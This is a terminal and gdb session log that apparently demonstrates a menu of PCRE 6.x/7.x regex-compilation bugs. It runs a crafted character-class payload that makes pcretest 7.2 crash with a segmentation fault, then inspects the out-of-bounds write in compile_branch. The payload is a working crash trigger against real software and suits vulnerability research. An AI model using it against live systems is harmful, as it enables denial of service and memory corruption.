: user@vapor|0; pwd
/demos/pcre
: user@vapor|0; source ../demos.sh
: demo@vapor|0; handle_product
bash: config.sh: line 37: syntax error near unexpected token `('
bash: config.sh: line 37: `function ()'
00. lone \E with trigger char (6.x+)
01. matched \E deref (6.x+)
02. grouped string with \E (6.x+)
03. \E in character class (7.x+)
04. not a single char class (7.x+)
05. ditto, variation (7.x+)
06. optimised cond in group (6.x+)
07. variation (6.x+)
08. backtrack too far (6.x+)
09. another variant (6.x+)
10. seeking past end for \c (7.x+)
11. integer overflow (7.x)
12. integer overflow (7.x)
select vulnerability: 12
integer overflow (7.x) selected.

payload: /[\g6666666666]/\ndata\n
press enter to run.

[1] 29526
PCRE version 7.2 2007-06-19

  re>
../demos.sh: line 80: 29528 Segmentation fault (core dumped) /usr/local/encap/pcre-7.2/bin/pcretest <<(echo -e "$payload")
[1]+ Exit 139 ( eval $cmd )
Core file generated. Opening gdb ...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

warning: Can't read pathname for load map: Input/output error.
Reading symbols from /usr/local/encap/pcre-7.2/lib/libpcreposix.so.0...done.
Loaded symbols for /usr/local/encap/pcre-7.2/lib/libpcreposix.so.0
Reading symbols from /usr/local/encap/pcre-7.2/lib/libpcre.so.0...done.
Loaded symbols for /usr/local/encap/pcre-7.2/lib/libpcre.so.0
Reading symbols from /lib/tls/i686/cmov/libc.so.6...Reading symbols from /usr/lib/debug/lib/tls/i686/cmov/libc-2.3.6.so...done.
done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...Reading symbols from /usr/lib/debug/lib/ld-2.3.6.so...done.
done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `/usr/local/encap/pcre-7.2/bin/pcretest'.
Program terminated with signal 11, Segmentation fault.
#0  0xf7fdb517 in compile_branch (optionsptr=0xffffa670, codeptr=0xffffa634, ptrptr=0xffffa638, errorcodeptr=0xffffb724, firstbyteptr=0xffffa630, reqbyteptr=0xffffa62c,
    bcptr=0xffffa620, cd=0xffffb6c8, lengthptr=0xffffa628) at pcre_compile.c:3027
3027  classbits[c/8] |= (1 << (c&7));
>> p c
$1 = 0x72a2bd3b
>> p classbits
$2 = '\0'
>> p classbits[c/8]
Cannot access memory at address 0xe53fc13
>> info reg
eax     0xe5457a7   0xe5457a7
ecx     0xf7ff7a80  0xf7ff7a80
edx     0xffffa490  0xffffa490
ebx     0xf7ff7a80  0xf7ff7a80
esp     0xffffa340  0xffffa340
ebp     0xffffa5d8  0xffffa5d8
esi     0xe5457a7   0xe5457a7
edi     0xffffa48c  0xffffa48c
eip     0xf7fdb517  0xf7fdb517
eflags  0x10202     [ IF RF ]
cs      0x23        0x23
ss      0x2b        0x2b
ds      0x2b        0x2b
es      0x2b        0x2b
fs      0x0         0x0
gs      0x63        0x63
>> l
3022  else
3023  #endif /* SUPPORT_UTF8 */
3024
3025  /* Handle a single-byte character */
3026  {
3027  classbits[c/8] |= (1 << (c&7));
3028  if ((options & PCRE_CASELESS) != 0)
3029  {
3030  c = cd->fcc[c]; /* flip case */
3031  classbits[c/8] |= (1 << (c&7));
>>
3032  }
3033  class_charcount++;
3034  class_lastchar = c;
3035  }
3036  }
3037
3038  /* Loop until ']' reached. This "while" is the end of the "do" above. */
3039
3040  while ((c = *(++ptr)) != 0 && (c != ']' || inescq));
3041
>> quit
: demo@vapor|0; exit